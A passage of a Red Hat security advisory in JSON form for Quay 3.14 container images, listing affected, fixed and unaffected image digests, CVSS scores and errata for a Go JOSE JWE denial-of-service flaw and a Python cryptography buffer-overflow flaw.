            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2455470"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Go JOSE, a library for handling JSON Web Encryption (JWE) objects. A remote attacker could exploit this vulnerability by providing a specially crafted JWE object. When decrypting such an object, if a key wrapping algorithm is specified but the encrypted key field is empty, the application can crash. This leads to a denial of service (DoS), making the affected service unavailable to legitimate users.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "RHBZ#2455470",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455470"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-34986",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34986"
        },
        {
          "category": "external",
          "summary": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8",
          "url": "https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants",
          "url": "https://pkg.go.dev/github.com/go-jose/go-jose/v4#pkg-constants"
        }
      ],
      "release_date": "2026-04-06T16:22:45.353000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "github.com/go-jose/go-jose/v3: github.com/go-jose/go-jose/v4: Go JOSE: Denial of Service via crafted JSON Web Encryption (JWE) object"
    },
    {
      "cve": "CVE-2026-39892",
      "cwe": {
        "id": "CWE-131",
        "name": "Incorrect Calculation of Buffer Size"
      },
      "discovery_date": "2026-04-08T22:00:59.416053+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456735"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the cryptography library. This vulnerability occurs when a non-contiguous buffer is passed to certain application programming interfaces (APIs) that accept Python buffers, such as Hash.update(). A remote attacker could exploit this to cause a buffer overflow, potentially leading to a denial of service.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "cryptography: Cryptography: Buffer overflow via non-contiguous buffer in API",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "In default configurations Red Hat products isolate service processes from total system access. Should an attacker be able to exploit this vulnerability their impact will be limited to that service account and they will not have access to the broader system.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
